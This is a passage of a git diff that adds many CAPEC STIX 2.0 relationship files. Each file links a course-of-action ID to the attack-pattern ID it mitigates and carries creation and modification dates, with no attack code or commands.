"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--02b3d9fd-cd9e-430a-aa34-e1bae27fc0b6.json b/capec/relationship/relationship--02b3d9fd-cd9e-430a-aa34-e1bae27fc0b6.json new file mode 100644 index 0000000000..8c67887595 --- /dev/null +++ b/capec/relationship/relationship--02b3d9fd-cd9e-430a-aa34-e1bae27fc0b6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--83361a44-03c8-413c-88dd-64dc0bbb6d5b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--02b3d9fd-cd9e-430a-aa34-e1bae27fc0b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-06T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53", + "target_ref": "attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--030ebc4a-d927-4e86-8e10-3247f913cfdf.json b/capec/relationship/relationship--030ebc4a-d927-4e86-8e10-3247f913cfdf.json new file mode 100644 index 0000000000..7f9f02f41c --- /dev/null +++ b/capec/relationship/relationship--030ebc4a-d927-4e86-8e10-3247f913cfdf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c12b0009-6284-4143-bd70-aaf55e1cdff2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--030ebc4a-d927-4e86-8e10-3247f913cfdf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--03143b55-e365-45e3-8ce7-add9d0df2063.json b/capec/relationship/relationship--03143b55-e365-45e3-8ce7-add9d0df2063.json new file mode 100644 index 0000000000..fd69624dc7 --- /dev/null +++ b/capec/relationship/relationship--03143b55-e365-45e3-8ce7-add9d0df2063.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4d63cbd6-cf25-434a-b5e5-f0e973e2678f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03143b55-e365-45e3-8ce7-add9d0df2063", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a", + "target_ref": "attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--035510a6-4df7-43c5-a925-5c7a32099a19.json b/capec/relationship/relationship--035510a6-4df7-43c5-a925-5c7a32099a19.json new file mode 100644 index 0000000000..d94ba15186 --- /dev/null +++ b/capec/relationship/relationship--035510a6-4df7-43c5-a925-5c7a32099a19.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a77c6eda-8531-44d6-810e-5fd0545405d4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--035510a6-4df7-43c5-a925-5c7a32099a19", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0388e527-777a-43f8-b7b9-f66f589f0d17.json b/capec/relationship/relationship--0388e527-777a-43f8-b7b9-f66f589f0d17.json new file mode 100644 index 0000000000..b0ce66b7d2 --- /dev/null +++ b/capec/relationship/relationship--0388e527-777a-43f8-b7b9-f66f589f0d17.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--249b1e09-4b32-4d9e-91fe-d986ebe1557f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0388e527-777a-43f8-b7b9-f66f589f0d17", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--03bacfac-0c39-45ba-afff-5ebfd7915d35.json b/capec/relationship/relationship--03bacfac-0c39-45ba-afff-5ebfd7915d35.json new file mode 100644 index 0000000000..bb1dca6b36 --- /dev/null +++ b/capec/relationship/relationship--03bacfac-0c39-45ba-afff-5ebfd7915d35.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c9b4d85d-0803-4384-92d9-346a6024c648", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03bacfac-0c39-45ba-afff-5ebfd7915d35", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5", + "target_ref": "attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--040e879b-8793-4135-b210-1c25ea56c4a7.json b/capec/relationship/relationship--040e879b-8793-4135-b210-1c25ea56c4a7.json new file mode 100644 index 0000000000..5079cf198e --- /dev/null +++ b/capec/relationship/relationship--040e879b-8793-4135-b210-1c25ea56c4a7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d1e44e1-854f-4c3c-b6bb-4d6c40a743c3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--040e879b-8793-4135-b210-1c25ea56c4a7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8", + "target_ref": "attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--04166c81-46af-491c-bef7-9923dbc63070.json b/capec/relationship/relationship--04166c81-46af-491c-bef7-9923dbc63070.json new file mode 100644 index 0000000000..43bc844033 --- /dev/null +++ b/capec/relationship/relationship--04166c81-46af-491c-bef7-9923dbc63070.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8c210b6e-6e8b-452f-8706-31509a4a7dbc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04166c81-46af-491c-bef7-9923dbc63070", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0447a117-2569-47f3-8dcd-65036bcf0970.json b/capec/relationship/relationship--0447a117-2569-47f3-8dcd-65036bcf0970.json new file mode 100644 index 0000000000..6d225873fe --- /dev/null +++ b/capec/relationship/relationship--0447a117-2569-47f3-8dcd-65036bcf0970.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--03a81a97-cdea-4f19-86c0-ad8dfb87d9f5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0447a117-2569-47f3-8dcd-65036bcf0970", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0480be94-c756-4751-b321-18a928abdf59.json b/capec/relationship/relationship--0480be94-c756-4751-b321-18a928abdf59.json new file mode 100644 index 0000000000..3d539008db --- /dev/null +++ b/capec/relationship/relationship--0480be94-c756-4751-b321-18a928abdf59.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1c517bd4-8f36-4acb-a315-b979006ce4d0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0480be94-c756-4751-b321-18a928abdf59", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad", + "target_ref": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0483eeb1-b303-43dd-a4a4-8706e2f4f97c.json b/capec/relationship/relationship--0483eeb1-b303-43dd-a4a4-8706e2f4f97c.json new file mode 100644 index 0000000000..d50430dd5a --- /dev/null +++ b/capec/relationship/relationship--0483eeb1-b303-43dd-a4a4-8706e2f4f97c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ef48c192-6f62-4b5b-9d11-56af3691ab28", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0483eeb1-b303-43dd-a4a4-8706e2f4f97c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "target_ref": "attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb.json b/capec/relationship/relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb.json new file mode 100644 index 0000000000..23c65b3e3b --- /dev/null +++ b/capec/relationship/relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--645caec1-4291-492a-8189-c7bc6ffa2b91", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db", + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--06734356-1867-48f6-ba0d-a30c308aa090.json b/capec/relationship/relationship--06734356-1867-48f6-ba0d-a30c308aa090.json new file mode 100644 index 0000000000..c80cb979e1 --- /dev/null +++ b/capec/relationship/relationship--06734356-1867-48f6-ba0d-a30c308aa090.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f6be4d30-52e5-4210-8459-92e9a1ef4978", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06734356-1867-48f6-ba0d-a30c308aa090", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--06918c00-aa82-45c3-9c95-b649ae753370.json b/capec/relationship/relationship--06918c00-aa82-45c3-9c95-b649ae753370.json new file mode 100644 index 0000000000..39383ab9fe --- /dev/null +++ b/capec/relationship/relationship--06918c00-aa82-45c3-9c95-b649ae753370.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d3521b5e-c684-4a6c-a1ea-a427014da193", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06918c00-aa82-45c3-9c95-b649ae753370", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90.json b/capec/relationship/relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90.json new file mode 100644 index 0000000000..2c52dfb7c3 --- /dev/null +++ b/capec/relationship/relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0f977fc2-e4d3-4089-9353-badf57616770", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--06bf9287-f775-4bd0-a269-0523b5e8bc8f.json b/capec/relationship/relationship--06bf9287-f775-4bd0-a269-0523b5e8bc8f.json new file mode 100644 index 0000000000..b525a85472 --- /dev/null +++ b/capec/relationship/relationship--06bf9287-f775-4bd0-a269-0523b5e8bc8f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5a84a0ee-dccd-4ed1-8283-b507915b872b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06bf9287-f775-4bd0-a269-0523b5e8bc8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d.json b/capec/relationship/relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d.json new file mode 100644 index 0000000000..27e80edf35 --- /dev/null +++ b/capec/relationship/relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--45c8c7fe-f236-4d1f-a47e-f8c76a88d522", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212", + "target_ref": "attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--07ca287a-78fb-473c-a87f-00cf46c5954c.json b/capec/relationship/relationship--07ca287a-78fb-473c-a87f-00cf46c5954c.json new file mode 100644 index 0000000000..a5e4cb2d04 --- /dev/null +++ b/capec/relationship/relationship--07ca287a-78fb-473c-a87f-00cf46c5954c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--19105cf8-08b5-42f4-8698-dc5dc7f13379", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--07ca287a-78fb-473c-a87f-00cf46c5954c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3", + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934.json b/capec/relationship/relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934.json new file mode 100644 index 0000000000..6c7554eecf --- /dev/null +++ b/capec/relationship/relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2cab59ca-c0b0-4717-b951-ab2bc36d6c84", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--17b27433-058d-4611-8ea1-bf410322ede5", + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--08835a39-a775-4a48-91fc-9b8215778f8e.json b/capec/relationship/relationship--08835a39-a775-4a48-91fc-9b8215778f8e.json new file mode 100644 index 0000000000..36e3523904 --- /dev/null +++ b/capec/relationship/relationship--08835a39-a775-4a48-91fc-9b8215778f8e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--02a60223-11e7-468b-a46b-51e44d254312", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--08835a39-a775-4a48-91fc-9b8215778f8e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40", + "target_ref": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0900c8f8-f195-448d-96d4-f618683f6f38.json b/capec/relationship/relationship--0900c8f8-f195-448d-96d4-f618683f6f38.json new file mode 100644 index 0000000000..3caca9266b --- /dev/null +++ b/capec/relationship/relationship--0900c8f8-f195-448d-96d4-f618683f6f38.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5d0648fe-c193-42e0-85b2-dedd79cea9c8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0900c8f8-f195-448d-96d4-f618683f6f38", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--09d07884-802a-43c4-af61-82225dd3b9d5.json b/capec/relationship/relationship--09d07884-802a-43c4-af61-82225dd3b9d5.json new file mode 100644 index 0000000000..2a43272b9b --- /dev/null +++ b/capec/relationship/relationship--09d07884-802a-43c4-af61-82225dd3b9d5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0fa4d05e-f985-4f88-8b42-af2f84c206f3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09d07884-802a-43c4-af61-82225dd3b9d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356", + "target_ref": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0a2f1057-c343-415a-8403-0e54ee1b2102.json b/capec/relationship/relationship--0a2f1057-c343-415a-8403-0e54ee1b2102.json new file mode 100644 index 0000000000..6761a40576 --- /dev/null +++ b/capec/relationship/relationship--0a2f1057-c343-415a-8403-0e54ee1b2102.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2fb776fa-ae3c-4d3e-9ed3-062f4f9f1f53", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0a2f1057-c343-415a-8403-0e54ee1b2102", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0a42ecec-67a3-4c2a-ae8c-793f827f9040.json b/capec/relationship/relationship--0a42ecec-67a3-4c2a-ae8c-793f827f9040.json new file mode 100644 index 0000000000..5137b44d98 --- /dev/null +++ b/capec/relationship/relationship--0a42ecec-67a3-4c2a-ae8c-793f827f9040.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3bbdc464-0c27-49b9-8f56-d0a78a14907c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0a42ecec-67a3-4c2a-ae8c-793f827f9040", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150", + "target_ref": "attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7.json b/capec/relationship/relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7.json new file mode 100644 index 0000000000..bedf976403 --- /dev/null +++ b/capec/relationship/relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--11826ff8-fab3-4a69-b9dc-4ee36d38b243", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003", + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0a8f8ebb-cbfb-411a-8036-205a911f1722.json b/capec/relationship/relationship--0a8f8ebb-cbfb-411a-8036-205a911f1722.json new file mode 100644 index 0000000000..bae947c1e5 --- /dev/null +++ b/capec/relationship/relationship--0a8f8ebb-cbfb-411a-8036-205a911f1722.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--792aaffa-61d9-4d98-9afb-9a7ea19eccb0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0a8f8ebb-cbfb-411a-8036-205a911f1722", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a584f684-db15-4faa-94d2-5a729f32f979", + "target_ref": "attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0ae39bc1-3667-4e29-a2eb-ce457b0e97a1.json b/capec/relationship/relationship--0ae39bc1-3667-4e29-a2eb-ce457b0e97a1.json new file mode 100644 index 0000000000..3535c3bb6b --- /dev/null +++ b/capec/relationship/relationship--0ae39bc1-3667-4e29-a2eb-ce457b0e97a1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b239754f-b58a-447e-9151-358468b0c5d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0ae39bc1-3667-4e29-a2eb-ce457b0e97a1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0", + "target_ref": "attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0b1dadc1-c04d-4c4e-8c94-bfa6711753ca.json b/capec/relationship/relationship--0b1dadc1-c04d-4c4e-8c94-bfa6711753ca.json new file mode 100644 index 0000000000..20a3cedf24 --- /dev/null +++ b/capec/relationship/relationship--0b1dadc1-c04d-4c4e-8c94-bfa6711753ca.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--31c47108-f323-490f-9c93-2c701818ae47", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b1dadc1-c04d-4c4e-8c94-bfa6711753ca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--54200ccf-356d-40d9-abff-5906b5d13075", + "target_ref": "attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef", + "object_marking_refs": [ + 